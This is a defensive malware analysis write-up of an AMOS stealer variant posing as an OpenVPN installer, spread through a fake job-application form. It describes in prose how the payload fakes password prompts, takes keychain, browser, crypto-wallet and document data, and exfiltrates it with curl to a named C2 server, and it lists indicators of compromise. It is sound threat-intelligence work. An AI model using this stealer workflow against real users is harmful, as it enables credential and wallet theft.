Malware Research - AMOS Variant (OpenVPN)
I was given the opportunity to conduct malware analysis on a suspicious program downloaded by one of our employees at work. I was praised for my efforts and dedication in analyzing it which gave me the motivation to keep on learning about malware analysis and CTI. Here is my writeup on the whole incident.
Summary
The payload was a variant of the Atomic macOS Stealer (AMOS) that affects both Windows and macOS users. The reason why I documented this incident was because it was the first (to my knowledge) AMOS variant that masqueraded OpenVPN and used RC4 as its payload encryption method. Attachment (password is infected)
Distribution
On 12 September 2024, the victim received a Google Form from a company called Vantage Point Media using the email address of vpmediatech[.]com. This Google Form acted as a hiring test whereby it prompted the victim to input their email, full name and answers for a set of questions replicating real interview questions.
On the final page, the victim will then be prompted to download a suspicious installation media that works on both Windows and macOS machines with the download link hxxps[:]//openvpn[.]tech/vpn-download.
If the victim was using macOS, accessing the download link will redirect the victim to hxxps[:]//utv4fun[.]com/kusaka.php?call=vpn where a DMG file will be fetched and downloaded.
Note: It seems like the malicious DMG file might be polymorphic due to having a version number each time a new DMG file was downloaded from the URL.
If the victim was using Windows, accessing the download link will redirect the user to hxxps[:]//openvpn-win[.]pages[.]dev where a MSI installer will be fetched and downloaded. However, the scope of this writeup will only be on the DMG file for now.
Malware Analysis
Mounting the DMG file on a virtual machine, a universal Mach-O binary called openvpn-connect can be obtained that supports both x86 and ARM architectures. It was also ad-hoc signed which means that it does not contain any cryptographic proof.
Executing the DMG file, a prompt will be shown on-screen to instruct the user to launch the malicious Mach-O binary by right clicking and opening it directly. This was a common tactic used to override the integrated security feature in Apple’s operating system (also known as GateKeeper) and execute unsigned applications.
Launching the Mach-O binary, the user will be prompted again to input the root password. This was most likely to trick the user in providing root privileges for the malware to access certain macOS utilities.
Decompiling the Mach-O binary with otool, a long hex string can be identified, suggesting that the payload might be encoded in hex.
Coincidentally, a 32-byte hex string can be identified right below the encoded payload, most likely a decryption key.
Payload Analysis
Attempting to decrypt the hex string with multiple encryption algorithms, the payload was successfully decrypted with RC4. The full AppleScript payload can be obtained for further analysis.
Hide Terminal and Create Staging Directory
Analyzing the payload, it begins by ensuring the Terminal window stays hidden while the payload is running in the background to conceal itself from the user.
It then retrieves the current username to construct a path to the user’s home directory. It also creates a staging directory on /tmp/ to store the stolen data. The staging directory name seems to be generated using a random four-digit number in the range of 1000-9999.
Extract System Information
The data extraction process begins with the system information including software, hardware, and display configurations using the system_profiler utility. The result of this command is then written to a file named “info” under the staging directory.
Password Prompt using DSCL
The payload constructs the path to the user’s Application Support directory, which is used to locate various application data. It then calls a function to retrieve the user’s password via an authentication prompt using the DSCL utility.
If the password entered was valid, the payload will attempt to retrieve the Chrome password from the macOS keychain and write it to a file named “masterpass-chrome” under the staging directory. If not, the payload enters a loop that will continuously prompt the user for the valid password.
Extract Browser and Cryptocurrency Wallet Data
Several mappings were created to define the directory paths for specific Chromium-based browsers and cryptocurrency wallet applications. The payload then proceeds to recursively read the stored data in the mapped directories to extract Chromium-based browser data (cookies, web data, plugins, etc.) and JSON files for specific cryptocurrency wallet applications.
The payload was also extracting Safari cookies, Apple Note database and files with the extension of .pdf, .docx, .doc, .wallet and .keys on the Desktop, Documents and Downloads folder. These extracted data are copied and placed within a folder named “FileGrabber” under the staging directory.
Interesting observation: The FileGrabber function seem to only extract files that do not exceed the file size of 10 MB before copying them to the “FileGrabber” folder. This was most likely done to prevent network bandwidth issues, server limitations, and timeouts during data exfiltration to the C2 server.
Data from other sources including Firefox data, keychain database and Telegram data, was also extracted and stored as different files under the staging directory.
Exfiltration
Finally, the payload compresses the staging directory into a ZIP file out.zip to be exfiltrated to the C2 server using curl. The ZIP file was sent via a HTTP POST request to http://85.209.11.155/joinsystem/ using a predefined user and BuildID. The payload then covers its track by removing the staging directory and ZIP file from the system after exfiltration.
Indicators of Compromise
| Indicators | Type | Description |
|---|---|---|
| 7f4582259482af646aecd6b1addb50cb283706753376e7dbadb4c33ab3ddff21 | SHA256 | DMG file |
| 9793fc09d1f18b16cc7e1af52e68957387eda27e904fe44cdad904016fcb55b8 | SHA256 | Mach-O binary |
| hxxps://docs[.]google[.]com/forms/d/e/1FAIpQLSdjxyobIi5WKyT9dvL8NgYBk6434oYqhGomOHrCDPSBK1shCw/viewform?usp=sf_link | URL | Google Form |
| hxxps://openvpn[.]tech/vpn-download | URL | Download link |
| hxxps://utv4fun[.]com/kusaka[.]php?call=vpn | URL | macOS installer download |
| hxxps://openvpn-win[.]pages[.]dev | URL | Windows installer download |
| openvpn[.]tech | Domain | Malicious domain |
| 85[.]209[.]11[.]155 | IP address | C2 server |